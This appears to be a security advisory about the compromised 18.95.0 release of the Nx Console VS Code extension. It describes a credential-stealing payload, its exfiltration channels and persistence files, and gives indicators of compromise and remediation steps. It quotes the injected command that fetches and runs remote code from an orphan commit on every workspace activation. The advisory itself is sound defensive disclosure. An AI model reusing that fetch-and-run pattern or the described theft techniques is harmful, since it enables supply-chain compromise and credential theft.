Nx Console VS Code Extension Compromised

This is a developing story. We will update this post with additional findings and detailed payload analysis, as our investigation continues.

Summary

On May 18, 2026, we identified that Nx Console (nrwl.angular-console), a popular VS Code extension with over 2.2 million installations, was compromised. Version 18.95.0 published to the VS Code Marketplace contains malicious code that executes an obfuscated payload upon workspace activation. The prior version (18.94.0) and the remediation version (18.100.0) are not affected.

This is the second major supply chain attack against the Nx ecosystem in less than a year. In August 2025, the "s1ngularity" attack compromised the nx npm package and several plugins, exfiltrating developer credentials via a malicious postinstall script. See our prior analysis.

This is a developing situation. We are actively investigating and will update this post with additional technical details and indicators of compromise as our analysis progresses.

What Happened

Version 18.95.0 of the Nx Console VS Code extension was published to the VS Code Marketplace outside the project's normal CI/CD pipeline, likely using stolen publishing credentials (VSCE_PAT). The malicious version injects code into the extension's main.js that runs npx -y github:nrwl/nx#558b09d7... on every workspace activation. This references a dangling orphan commit on the nrwl/nx GitHub repository containing a ~498 KB obfuscated JavaScript payload.

Key observations:

• Version 18.95.0 does not have a corresponding GitHub release — it was published directly to the marketplace, bypassing CI/CD.
• The malicious commit on nrwl/nx is unsigned, has no parent commits (orphan), and is not reachable from any branch.
• The commit is attributed to a developer account that is no longer a public member of the nrwl GitHub organization. All recent legitimate commits from this account are GPG-signed; the malicious commit is not.
• The commit message reads "Don't delete this commit before 24 hours or wiper activates" — social engineering intended to delay incident response.
• Open VSX was not affected — the malicious version was only published to the VS Code Marketplace.

Payload Capabilities

Our static analysis of the obfuscated payload reveals a sophisticated, multi-stage credential stealer and exfiltration tool. Key capabilities include:

• Credential theft targeting GitHub, NPM, AWS, HashiCorp Vault, Kubernetes, 1Password, SSH keys, and database connection strings
• Three exfiltration channels: HTTPS to a C2 server on port 443, GitHub API-based exfiltration, and DNS tunneling
• Sigstore attestation forgery: ability to steal OIDC tokens and forge SLSA provenance to publish maliciously-signed npm packages
• Persistence mechanisms: macOS LaunchAgent (com.user.kitty-monitor.plist), Python backdoor (cat.py), and Bun-based scripts
• CI/CD targeting: GitHub Actions runner memory scraping and privilege escalation via sudoers manipulation
• Anti-analysis features: geolocation filtering, self-daemonization, and multi-layer obfuscation (obfuscator.io + PBKDF2-encrypted strings)

This is notably the second major supply chain attack against the Nx ecosystem in less than a year. The first occurred in August 2025 (GHSA-cxm3-wv7p-598c), targeting npm packages directly.

Who Is Affected

You may be affected if:

• You use VS Code, Cursor, or any VS Code-based editor with the Nx Console extension installed
• Your extension auto-updated to version 18.95.0 on May 18, 2026
• You opened any workspace after the update was applied

What You Should Do

1. Check your extension version: Run code --list-extensions --show-versions | grep angular-console. If you see version 18.95.0, you are affected.
2. Update immediately to version 18.100.0 or later.
3. Check for persistence: Look for ~/.local/share/kitty/cat.py and ~/Library/LaunchAgents/com.user.kitty-monitor.plist on your system. Remove them if found.
4. Rotate all credentials: GitHub tokens, NPM tokens, SSH keys, AWS credentials, cloud CLI credentials, HashiCorp Vault tokens, and any API keys accessible from your machine or CI/CD environment.
5. Audit CI/CD environments: If you use GitHub Actions with Nx, review recent workflow runs for unexpected artifacts, commits, or secret access.
6. Review npm packages: If you publish npm packages, check for unauthorized versions that may have been published using stolen tokens.

Indicators of Compromise

File Hashes (SHA-256)

FileSHA-256Malicious VSIX (v18.95.0)1a4afce34918bdc74ae3f31edaffffaa0ee074d83618f53edfd88137927340b8Malicious main.jsb0cefb66b953e5184b6adb3035e9e267335ac5eabfe1848e07834777b9397b74Obfuscated payload (index.js)e7347d90653efc565f03733a95e9209d78f9cfa81e31ff2b2dd9d48d75a4b8b1

File System Indicators

• ~/.local/share/kitty/cat.py
• ~/Library/LaunchAgents/com.user.kitty-monitor.plist
• /tmp/kitty-* directories

Network Indicators

• api.github.com/search/commits?q=firedalazer (C2 polling)
• Connections to AWS IMDS (169.254.169.254) from non-AWS environments

This is a developing story. We will update this post with additional findings, including full MITRE ATT&CK mapping and detailed payload analysis, as our investigation continues.

References

• GitHub Issue #3139
• GHSA-c9j4-9m59-847w
• Nx Console on VS Code Marketplace
• Malicious dangling commit on nrwl/nx

‍